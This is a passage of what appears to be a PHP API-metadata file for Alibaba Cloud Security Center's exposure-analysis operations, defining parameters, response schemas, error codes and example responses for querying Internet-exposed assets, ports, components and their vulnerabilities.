'title' => ''], 'RealVulList' => [ 'description' => 'The information about the vulnerabilities that are exposed on the Internet and can be exploited by attackers.'."\n", 'type' => 'array', 'items' => [ 'description' => '', 'type' => 'object', 'properties' => [ 'Type' => ['description' => 'The type of the vulnerability. Valid values:'."\n" ."\n" .'* **cve**: Linux software vulnerabilities'."\n" .'* **sys**: Windows system vulnerabilities'."\n" .'* **cms**: Web-CMS vulnerabilities'."\n" .'* **app**: application vulnerabilities'."\n" .'* **emg**: urgent vulnerabilities'."\n" .'* **sca**: middleware vulnerabilities'."\n", 'type' => 'string', 'example' => 'sca', 'title' => ''], 'Necessity' => ['description' => 'The priority to fix the vulnerability. Valid values:'."\n" ."\n" .'* **asap**: high'."\n" .'* **later**: medium'."\n" .'* **nntf**: low'."\n" ."\n" .'> We recommend that you fix the vulnerabilities that have the **high** priority at the earliest opportunity.'."\n", 'type' => 'string', 'example' => 'asap', 'title' => ''], 'Uuid' => ['description' => 'The UUID of the server.'."\n", 'type' => 'string', 'example' => '4f9ce097-4a7d-48fe-baef-6960e5b6****', 'title' => ''], 'AliasName' => ['description' => 'The alias of the vulnerability.'."\n", 'type' => 'string', 'example' => 'RHSA-2022:0274-Important: polkit pkexec Local Privilege Escalation Vulnerability(CVE-2021-4034)', 'title' => ''], 'Name' => ['description' => 'The name of the vulnerability.'."\n", 'type' => 'string', 'example' => 'SCA:ACSV-2020-052801', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'AllVulList' => [ 'description' => 'The information about all vulnerabilities on the server.'."\n", 'type' => 'array', 'items' => [ 'description' => '', 'type' => 'object', 'properties' => [ 'Type' => ['description' => 'The type of the vulnerability. Valid values:'."\n" ."\n" .'* **cve**: Linux software vulnerabilities'."\n" .'* **sys**: Windows system vulnerabilities'."\n" .'* **cms**: Web-CMS vulnerabilities'."\n" .'* **app**: application vulnerabilities'."\n" .'* **emg**: urgent vulnerabilities'."\n" .'* **sca**: middleware vulnerabilities'."\n", 'type' => 'string', 'example' => 'sca', 'title' => ''], 'Necessity' => ['description' => 'The priority to fix the vulnerability. Valid values:'."\n" ."\n" .'* **asap**: high'."\n" .'* **later**: medium'."\n" .'* **nntf**: low'."\n" ."\n" .'> We recommend that you fix the vulnerabilities that have the **high** priority at the earliest opportunity.'."\n", 'type' => 'string', 'example' => 'asap', 'title' => ''], 'Uuid' => ['description' => 'The UUID of the server.'."\n", 'type' => 'string', 'example' => '4f9ce097-4a7d-48fe-baef-6960e5b6****', 'title' => ''], 'AliasName' => ['description' => 'The alias of the vulnerability.'."\n", 'type' => 'string', 'example' => 'RHSA-2022:0274-Important: polkit pkexec Local Privilege Escalation Vulnerability(CVE-2021-4034)', 'title' => ''], 'Name' => ['description' => 'The name of the vulnerability.'."\n", 'type' => 'string', 'example' => 'SCA:ACSV-2020-052801', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'CspmRiskList' => [ 'description' => 'The list of configuration risks.'."\n", 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'CheckName' => ['description' => 'The name of the check item.'."\n", 'type' => 'string', 'example' => '使用SSH密钥对登录', 'title' => ''], 'RiskLevel' => ['description' => 'The risk level. Valid values:'."\n" ."\n" .'* **HIGH**'."\n" .'* **MEDIUM**'."\n" .'* **LOW**'."\n", 'type' => 'string', 'example' => 'HIGH', 'title' => ''], 'InstanceId' => ['description' => 'The instance ID.'."\n", 'type' => 'string', 'example' => 'i-bp14ggqzi9k6ocfb****', 'title' => ''], 'RegionId' => ['description' => 'The region ID.'."\n", 'type' => 'string', 'example' => 'cn-hangzhou', 'title' => ''], 'AssetType' => ['description' => 'The instance type. Valid values:'."\n" ."\n" .'* 0: an ECS instance.'."\n" .'* 3: an ApsaraDB RDS instance.'."\n" .'* 4: an ApsaraDB for MongoDB instance.'."\n" .'* 5: an ApsaraDB for Redis instance.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'AssetTypeName' => ['description' => 'The name of the cloud asset type. Valid values:'."\n" ."\n" .'* **ECS**'."\n" .'* **RDS**'."\n" .'* **KVSTORE**'."\n" .'* **MONGODB**'."\n", 'type' => 'string', 'example' => 'ECS', 'title' => ''], 'AssetSubType' => ['description' => 'The subtype of the cloud asset. Valid values:'."\n" ."\n" .'* **0**: Elastic Compute Service (ECS).'."\n" ."\n" .' * **100**: instance.'."\n" ."\n" .'* **3**: ApsaraDB RDS.'."\n" ."\n" .' * **0**: instance.'."\n" ."\n" .'* **4**: ApsaraDB for MongoDB (MongoDB).'."\n" ."\n" .' * **0**: instance.'."\n" ."\n" .'* **5**: ApsaraDB for Redis (Redis).'."\n" ."\n" .' * **0**: instance.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '100', 'title' => ''], 'AssetSubTypeName' => ['description' => 'The subtype name of the cloud asset. Valid values:'."\n" ."\n" .'* **INSTANCE**: MongoDB instance, Apsara DB for RDS instance, and ApsaraDB for Redis instance.'."\n" .'* **ECS_INSTANCE**: ECS instance.'."\n", 'type' => 'string', 'example' => 'INSTANCE', 'title' => ''], 'Vendor' => ['description' => 'The type of the cloud asset by source. Valid values:'."\n" ."\n" .'* **0**: an asset provided by Alibaba Cloud.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'RdCheckNoPermission', 'errorMessage' => 'Resource directory account verification has no permission.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'RdCheckInnerError', 'errorMessage' => 'Resource directory account service internal error.', 'description' => ''], ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"type":"json","example":"{\\n \\"RequestId\\": \\"C590482B-54A7-4273-8115-9DBE2DE46B26\\",\\n \\"ExposedChains\\": [\\n {\\n \\"ExposureIp\\": \\"47.99.XX.XX\\",\\n \\"GroupNo\\": \\"test-group****\\",\\n \\"InternetIp\\": \\"47.99.XX.XX\\",\\n \\"InstanceId\\": \\"i-bp116qem8npvchqc****\\",\\n \\"ExposureType\\": \\"INTERNET_IP\\",\\n \\"IntranetIp\\": \\"192.168.XX.XX\\",\\n \\"ExposureTypeId\\": \\"eip-bp1bkgowzam49rld3****\\",\\n \\"RegionId\\": \\"cn-hangzhou\\",\\n \\"Uuid\\": \\"4f9ce097-4a7d-48fe-baef-6960e5b6****\\",\\n \\"ExposurePort\\": \\"22\\",\\n \\"InstanceName\\": \\"worker-k8s-for-cs-c929ee2a145214f89a8b248005be5****\\",\\n \\"ExposureComponent\\": \\"openssl,openssh\\",\\n \\"RealVulList\\": [\\n {\\n \\"Type\\": \\"sca\\",\\n \\"Necessity\\": \\"asap\\",\\n \\"Uuid\\": \\"4f9ce097-4a7d-48fe-baef-6960e5b6****\\",\\n \\"AliasName\\": \\"RHSA-2022:0274-Important: polkit pkexec Local Privilege Escalation Vulnerability(CVE-2021-4034)\\",\\n \\"Name\\": \\"SCA:ACSV-2020-052801\\"\\n }\\n ],\\n \\"AllVulList\\": [\\n {\\n \\"Type\\": \\"sca\\",\\n \\"Necessity\\": \\"asap\\",\\n \\"Uuid\\": \\"4f9ce097-4a7d-48fe-baef-6960e5b6****\\",\\n \\"AliasName\\": \\"RHSA-2022:0274-Important: polkit pkexec Local Privilege Escalation Vulnerability(CVE-2021-4034)\\",\\n \\"Name\\": \\"SCA:ACSV-2020-052801\\"\\n }\\n ],\\n \\"CspmRiskList\\": [\\n {\\n \\"CheckName\\": \\"使用SSH密钥对登录\\",\\n \\"RiskLevel\\": \\"HIGH\\",\\n \\"InstanceId\\": \\"i-bp14ggqzi9k6ocfb****\\",\\n \\"RegionId\\": \\"cn-hangzhou\\",\\n \\"AssetType\\": 0,\\n \\"AssetTypeName\\": \\"ECS\\",\\n \\"AssetSubType\\": 100,\\n \\"AssetSubTypeName\\": \\"INSTANCE\\",\\n \\"Vendor\\": 0\\n }\\n ]\\n }\\n ]\\n}","errorExample":""},{"type":"xml","example":"","errorExample":""}]', 'title' => 'DescribeExposedInstanceDetail', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeExposedInstanceDetail'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeExposedInstanceDetail', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'DescribeExposedInstanceList' => [ 'summary' => 'Queries information about assets exposed on the Internet.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '92077', 'abilityTreeNodes' => ['FEATUREsasAIJXMJ'], ], 'parameters' => [ [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of entries per page in a paged query. Default value: 20. If you leave this parameter empty, 20 entries are returned per page.'."\n" .'> Do not leave PageSize empty.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the current page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'GroupId', 'in' => 'query', 'schema' => ['description' => 'The ID of the server group that you want to query.'."\n" .'> You can call the [DescribeAllGroups](~~DescribeAllGroups~~) operation to query server group IDs.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '9535356', 'title' => ''], ], [ 'name' => 'VulStatus', 'in' => 'query', 'schema' => ['description' => 'Specifies whether the asset that you want to query has vulnerabilities. Valid values:'."\n" .'- **true**: The asset has vulnerabilities.'."\n" .'- **false**: The asset does not have vulnerabilities.', 'type' => 'boolean', 'required' => false, 'example' => 'true', 'title' => ''], ], [ 'name' => 'HealthStatus', 'in' => 'query', 'schema' => ['description' => 'Specifies whether the asset that you want to query has baseline weak password risks. Valid values:'."\n" ."\n" .'- **true**: The asset has baseline weak password risks.'."\n" .'- **false**: The asset does not have baseline weak password risks.', 'type' => 'boolean', 'required' => false, 'example' => 'true', 'title' => ''], ], [ 'name' => 'ExposureComponent', 'in' => 'query', 'schema' => ['description' => 'The name of the system component exposed on the Internet that you want to query.', 'type' => 'string', 'required' => false, 'example' => 'openssl', 'title' => ''], ], [ 'name' => 'ExposurePort', 'in' => 'query', 'schema' => ['description' => 'The exposed port that you want to query.', 'type' => 'string', 'required' => false, 'example' => '22', 'title' => ''], ], [ 'name' => 'ExposureIp', 'in' => 'query', 'schema' => ['description' => 'The public IP address of the server type or the public network connection address of the database type that you want to query.', 'type' => 'string', 'required' => false, 'example' => '116.12.XX.XX', 'title' => ''], ], [ 'name' => 'InstanceId', 'in' => 'query', 'schema' => ['description' => 'The instance ID of the asset that you want to query.', 'type' => 'string', 'required' => false, 'example' => 'i-bp1g6wxdwps7s9dz****', 'title' => ''], ], [ 'name' => 'InstanceName', 'in' => 'query', 'schema' => ['description' => 'The name of the asset that you want to query.', 'type' => 'string', 'required' => false, 'example' => 'abc_centos7.2_005', 'title' => ''], ], [ 'name' => 'ResourceDirectoryAccountId', 'in' => 'query', 'schema' => ['description' => 'The Alibaba Cloud account ID of the member accounts in the resource folder.'."\n" .'> You can invoke the [DescribeMonitorAccounts](~~DescribeMonitorAccounts~~) operation to obtain this parameter.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '16670360956*****', 'title' => ''], ], [ 'name' => 'AssetType', 'in' => 'query', 'schema' => ['description' => 'The asset type. Valid values:'."\n" ."\n" .'- **0**: ECS'."\n" ."\n" .'- **3**: RDS'."\n" ."\n" .'- **4**: MONGODB'."\n" ."\n" .'- **5**: RDS-Redis.', 'type' => 'string', 'required' => false, 'example' => '0', 'title' => ''], ], [ 'name' => 'CspmStatus', 'in' => 'query', 'schema' => ['description' => 'Specifies whether the asset that you want to query has Cloud Security Posture Management (CSPM) risks. Valid values:'."\n" ."\n" .'- **true**: The asset has CSPM risks.'."\n" .'- **false**: The asset does not have CSPM risks.', 'type' => 'boolean', 'required' => false, 'example' => 'true', 'title' => ''], ], [ 'name' => 'ExposureComponentBizType', 'in' => 'query', 'schema' => ['description' => 'The type of the exposed component.', 'type' => 'string', 'required' => false, 'example' => 'system_service', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '598A4A61-ABA7-456B-8725-7378258276D9', 'title' => ''], 'PageInfo' => [ 'description' => 'The pagination information.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The maximum number of entries per page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of Internet-exposed assets.', 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], 'Count' => ['description' => 'The number of entries returned on the current page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], ], 'title' => '', 'example' => '', ], 'ExposedInstances' => [ 'description' => 'The list of asset exposure analysis results.', 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'ExposureIp' => ['description' => 'The public IP address exposed on the Internet.', 'type' => 'string', 'example' => '116.12.XX.XX', 'title' => ''], 'TotalVulCount' => ['description' => 'The total number of vulnerabilities exposed on the Internet that can be exploited by attackers.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'InternetIp' => ['description' => 'The public IP address of the server.', 'type' => 'string', 'example' => '116.12.XX.XX', 'title' => ''], 'NntfVulCount' => ['description' => 'The number of low-severity vulnerabilities exposed on the Internet that can be exploited by attackers.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'InstanceId' => ['description' => 'The instance ID of the asset.', 'type' => 'string', 'example' => 'i-bp1g6wxdwps7s9dz****', 'title' => ''], 'ExposureType' => ['description' => 'The expose type. Valid values:'."\n" .'- **INTERNET_IP**: public IP addresses of Elastic Compute Service (ECS) instances'."\n" .'- **SLB**: public IP address of a load balancing SLB instance'."\n" .'- **EIP**: elastic IP address (EIP)'."\n" .'- **DNAT**: NAT gateway that uses the DNAT feature to connect to the Internet'."\n" ."\n" .'- **DB_CONNECTION**: public network connection of a database.', 'type' => 'string', 'example' => 'INTERNET_IP', 'title' => ''], 'IntranetIp' => ['description' => 'The private IP address of the server.', 'type' => 'string', 'example' => '192.168.XX.XX', 'title' => ''], 'RegionId' => ['description' => 'The ID of the region where the asset resides.'."\n" .'> For the mapping between region IDs and region names, see [Regions and zones](~~40654~~).', 'type' => 'string', 'example' => 'cn-hangzhou', 'title' => ''], 'ExposureTypeId' => ['description' => 'The instance ID that corresponds to the expose type. Different expose types correspond to different instance IDs. Valid values:'."\n" .'- If ExposureType is **INTERNET_IP**: the value is empty.'."\n" .'- If ExposureType is **SLB**: the value is the ID of the load balancing public instance.'."\n" .'- If ExposureType is **EIP**: the value is the ID of the EIP instance.'."\n" .'- If ExposureType is **DNAT**: the value is the ID of the NAT gateway instance.'."\n" .'- If ExposureType is **DB_CONNECTION**: the value is the ID of the database instance.', 'type' => 'string', 'example' => 'i-ew11313a****', 'title' => ''], 'AsapVulCount' => ['description' => 'The number of high-severity vulnerabilities exposed on the Internet that can be exploited by attackers.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'ExposurePort' => ['description' => 'The port exposed on the Internet.', 'type' => 'string', 'example' => '22', 'title' => ''], 'Uuid' => ['description' => 'The UUID of the server or the instance ID of the cloud service.', 'type' => 'string', 'example' => 'dd803d9e-a337-4add-9c5b-7d503e08****', 'title' => ''], 'GroupName' => ['description' => 'The name of the server group.', 'type' => 'string', 'example' => 'testGroup', 'title' => ''], 'GroupId' => ['description' => 'The ID of the server group.', 'type' => 'integer', 'format' => 'int64', 'example' => '9469268', 'title' => ''], 'ExploitHealthCount' => ['description' => 'The number of baseline weak password risks.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'InstanceName' => ['description' => 'The name of the asset.', 'type' => 'string', 'example' => 'abc_centos7.2_005', 'title' => ''], 'ExposureComponent' => ['description' => 'The system component exposed on the Internet.', 'type' => 'string', 'example' => 'openssl,openssh', 'title' => ''], 'LaterVulCount' => ['description' => 'The number of medium-severity vulnerabilities exposed on the Internet that can be exploited by attackers.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'CspmAlarmCount' => ['description' => 'The number of CSPM risks.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'AssetType' => ['description' => 'The asset type. Valid values: '."\n" .'- **0**: Elastic Computing Service (ECS) server'."\n" .'- **1**: load balancing (SLB)'."\n" .'- **2**: NAT gateway'."\n" .'- **3**: ApsaraDB RDS database'."\n" .'- **4**: MongoDB database'."\n" .'- **5**: Redis database'."\n" .'- **6**: container image (IMAGE)'."\n" .'- **7**: container (CONTAINER).', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'CloudAssetInfo' => ['description' => 'The JSON string of cloud service information for database-type assets. The fields include:'."\n" ."\n" .'- assetSubType: the asset subtype'."\n" .'- assetSubTypeName: the name of the asset subtype'."\n" .'- assetType: the asset type'."\n" .'- assetTypeName: the name of the asset type'."\n" .'- vendor: the asset vendor.', 'type' => 'string', 'example' => '{assetSubTypeName":"INSTANCE","assetType":3,"assetTypeName":"RDS","vendor":0}', 'title' => ''], 'ExposureComponentList' => [ 'description' => 'The list of exposed component information.', 'type' => 'array', 'items' => [ 'description' => 'The exposed component information.', 'type' => 'object', 'properties' => [ 'ListenPort' => ['description' => 'The exposed port.', 'type' => 'string', 'example' => '22', 'title' => ''], 'ComponentName' => ['description' => 'The exposed component.', 'type' => 'string', 'example' => 'openssh', 'title' => ''], 'ComponentVersion' => ['description' => 'The version of the exposed component.', 'type' => 'string', 'example' => '8.7p1', 'title' => ''], 'ComponentBizType' => ['description' => 'The type of the exposed component.', 'type' => 'string', 'example' => 'system_service', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'no permission', 'description' => ''], ['errorCode' => 'RdCheckNoPermission', 'errorMessage' => 'Resource directory account verification has no permission.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ['errorCode' => 'RdCheckInnerError', 'errorMessage' => 'Resource directory account service internal error.', 'description' => ''], ], ], 'eventInfo' => [ 'enable' => false, 'eventNames' => [], ], 'title' => 'Query information about internet-exposed assets', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeExposedInstanceList'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeExposedInstanceList', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"598A4A61-ABA7-456B-8725-7378258276D9\\",\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 2,\\n \\"Count\\": 2\\n },\\n \\"ExposedInstances\\": [\\n {\\n \\"ExposureIp\\": \\"116.12.XX.XX\\",\\n \\"TotalVulCount\\": 0,\\n \\"InternetIp\\": \\"116.12.XX.XX\\",\\n \\"NntfVulCount\\": 0,\\n \\"InstanceId\\": \\"i-bp1g6wxdwps7s9dz****\\",\\n \\"ExposureType\\": \\"INTERNET_IP\\",\\n \\"IntranetIp\\": \\"192.168.XX.XX\\",\\n \\"RegionId\\": \\"cn-hangzhou\\",\\n \\"ExposureTypeId\\": \\"i-ew11313a****\\",\\n \\"AsapVulCount\\": 0,\\n \\"ExposurePort\\": \\"22\\",\\n \\"Uuid\\": \\"dd803d9e-a337-4add-9c5b-7d503e08****\\",\\n \\"GroupName\\": \\"testGroup\\",\\n \\"GroupId\\": 9469268,\\n \\"ExploitHealthCount\\": 0,\\n \\"InstanceName\\": \\"abc_centos7.2_005\\",\\n \\"ExposureComponent\\": \\"openssl,openssh\\",\\n \\"LaterVulCount\\": 0,\\n \\"CspmAlarmCount\\": 0,\\n \\"AssetType\\": 0,\\n \\"CloudAssetInfo\\": \\"{assetSubTypeName\\\\\\":\\\\\\"INSTANCE\\\\\\",\\\\\\"assetType\\\\\\":3,\\\\\\"assetTypeName\\\\\\":\\\\\\"RDS\\\\\\",\\\\\\"vendor\\\\\\":0}\\",\\n \\"ExposureComponentList\\": [\\n {\\n \\"ListenPort\\": \\"22\\",\\n \\"ComponentName\\": \\"openssh\\",\\n \\"ComponentVersion\\": \\"8.7p1\\",\\n \\"ComponentBizType\\": \\"system_service\\"\\n }\\n ]\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeExposedStatistics' => [ 'summary' => 'Queries the statistics of asset exposure analysis.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '92079', 'abilityTreeNodes' => ['FEATUREsasAIJXMJ'], ], 'parameters' => [], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of this request, which is a unique identifier generated by Alibaba Cloud for the request. It can be used to troubleshoot and locate issues.', 'type' => 'string', 'example' => '4B897D10-B3CD-4A93-A5FA-591F3ED12A86', 'title' => ''], 'ExposedLaterVulCount' => ['description' => 'The total number of medium-risk vulnerabilities that are exposed on the Internet and can be exploited by hackers.', 'type' => 'integer', 'format' => 'int32', 'example' => '5', 'title' => ''], 'ExposedComponentCount' => ['description' => 'The total number of system components (such as OpenSSL and OpenSSH) on your servers that are exposed on the Internet.', 'type' => 'integer', 'format' => 'int32', 'example' => '7', 'title' => ''], 'ExposedPortCount' => ['description' => 'The total number of ports exposed on the Internet.', 'type' => 'integer', 'format' => 'int32', 'example' => '6', 'title' => ''], 'ExposedInstanceCount' => ['description' => 'The total number of assets exposed on the Internet.', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'ExposedWeekPasswordMachineCount' => ['description' => 'The total number of system keys on your servers that are exposed on the Internet.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'ExposedNntfVulCount' => ['description' => 'The total number of low-risk vulnerabilities that are exposed on the Internet and can be exploited by hackers.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'GatewayAssetCount' => ['description' => 'The total number of gateway assets (Server Load Balancer and NAT Gateway) exposed on the Internet.', 'type' => 'integer', 'format' => 'int32', 'example' => '3', 'title' => ''], 'ExposedIpCount' => ['description' => 'The total number of IP addresses exposed on the Internet.', 'type' => 'integer', 'format' => 'int32', 'example' => '100', 'title' => ''], 'ExposedAsapVulCount' => ['description' => 'The total number of high-risk vulnerabilities that are exposed on the Internet and can be exploited by hackers.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'ExposedEcsCount' => ['description' => 'The number of ECS assets exposed on the Internet.', 'type' => 'integer', 'format' => 'int32', 'example' => '5', 'title' => ''], 'ExposedRdsCount' => ['description' => 'The number of RDS database assets exposed on the Internet.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'ExposedKvstoreCount' => ['description' => 'The number of ApsaraDB for Redis database assets exposed on the Internet.', 'type' => 'integer', 'format' => 'int32', 'example' => '3', 'title' => ''], 'ExposedDdsCount' => ['description' => 'The number of ApsaraDB for MongoDB database assets exposed on the Internet.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'no permission', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query the statistics of asset exposure analysis', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '30', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeExposedStatistics'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeExposedStatistics', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"4B897D10-B3CD-4A93-A5FA-591F3ED12A86\\",\\n \\"ExposedLaterVulCount\\": 5,\\n \\"ExposedComponentCount\\": 7,\\n \\"ExposedPortCount\\": 6,\\n \\"ExposedInstanceCount\\": 10,\\n \\"ExposedWeekPasswordMachineCount\\": 20,\\n \\"ExposedNntfVulCount\\": 0,\\n \\"GatewayAssetCount\\": 3,\\n \\"ExposedIpCount\\": 100,\\n \\"ExposedAsapVulCount\\": 1,\\n \\"ExposedEcsCount\\": 5,\\n \\"ExposedRdsCount\\": 1,\\n \\"ExposedKvstoreCount\\": 3,\\n \\"ExposedDdsCount\\": 1\\n}","type":"json"}]', ], 'DescribeExposedStatisticsDetail' => [ 'summary' => 'Queries the list of gateway assets, ports, system components, or public IP addresses that are exposed on the Internet.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'list', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '92080', 'abilityTreeNodes' => ['FEATUREsasAIJXMJ'], 'autoTest' => true, 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The maximum number of entries per page in a paged query. Default value: 20. If you leave this parameter empty, 20 entries are returned per page.'."\n" .'> Set PageSize to a non-empty value.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the current page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'StatisticsType', 'in' => 'query', 'schema' => ['description' => 'The type of statistics to query. Valid values:'."\n" .'- **exposureType**: gateway assets exposed on the Internet.'."\n" .'- **exposurePort**: ports exposed on the Internet.'."\n" .'- **exposureComponent**: system components exposed on the Internet.'."\n" .'- **exposureIp**: IP addresses exposed on the Internet.', 'type' => 'string', 'required' => true, 'example' => 'exposureType', 'title' => ''], ], [ 'name' => 'StatisticsTypeInstanceValue', 'in' => 'query', 'schema' => ['description' => 'The instance ID of the gateway to query. This parameter takes effect only when **StatisticsType** is set to **exposureType**.', 'type' => 'string', 'required' => false, 'example' => 'lb-2ze4rso39h4nczcqs****', 'title' => ''], ], [ 'name' => 'StatisticsTypeGatewayType', 'in' => 'query', 'schema' => ['description' => 'The Asset Type of the gateway to query. This parameter takes effect only when **StatisticsType** is set to **exposureType**. Valid values:'."\n" .'- **SLB**: public IP address of a load balancing SLB instance.'."\n" .'- **DNAT**: NAT gateway that uses the DNAT feature to connect to the Internet.', 'type' => 'string', 'required' => false, 'example' => 'SLB', 'title' => ''], ], [ 'name' => 'ResourceDirectoryAccountId', 'in' => 'query', 'schema' => ['description' => 'The Alibaba Cloud account ID of the member accounts in the resource folder.'."\n" .'> Invoke the [DescribeMonitorAccounts](~~DescribeMonitorAccounts~~) operation to obtain this parameter.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1232428423234****', 'title' => ''], ], [ 'name' => 'Uuid', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The UUID of the server to query.', 'type' => 'string', 'example' => 'c9107c04-942f-40c1-981a-f1c1***', 'required' => false], ], [ 'name' => 'Criteria', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The query condition.', 'type' => 'string', 'example' => '{}', 'required' => false], ], [ 'name' => 